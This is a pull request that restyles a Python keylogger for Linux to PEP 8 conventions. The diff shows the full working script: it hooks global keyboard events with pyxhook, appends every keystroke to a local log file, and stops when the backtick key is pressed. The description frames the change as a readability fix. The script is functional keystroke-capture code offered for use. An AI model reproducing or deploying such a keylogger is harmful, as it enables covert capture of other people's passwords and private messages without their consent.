### PR TITLE
PEP 8 Compliance

### DIFF
--- a/linux/keylogger.py
+++ b/linux/keylogger.py
@@ -1,16 +1,18 @@
 import pyxhook
-#This tells the keylogger where the log will go. Change it to direct to where you want it.
-log_file='/home/Giacomo/Desktop/file.log'
-#The file will automatically appear on the desktop. You may want to edit the location!
-def OnKeyPress(event):
-  fob=open(log_file,'a')
-  fob.write(event.Key)
-  fob.write('\n')
 
-  if event.Ascii==96:
-    fob.close()
-    new_hook.cancel()
-new_hook=pyxhook.HookManager()
-new_hook.KeyDown=OnKeyPress
+# This tells the keylogger where the log file will go. Change as needed
+log_file = '/home/Giacomo/Desktop/file.log'
+
+
+def OnKeyPress(event):
+    fob = open(log_file, 'a')
+    fob.write(event.Key)
+    fob.write('\n')
+    if event.Ascii == 96:
+        fob.close()
+        new_hook.cancel()
+
+new_hook = pyxhook.HookManager()
+new_hook.KeyDown = OnKeyPress
 new_hook.HookKeyboard()
 new_hook.start()


### PR DESCRIPTION
Brought `keylogger.py` up to [PEP 8](https://www.python.org/dev/peps/pep-0008/) standards. Purely optional of course, but imo makes the code more readable.

Didn't do it for `pyxhook.py` btw since I figure it'd be more sensible to do that upstream.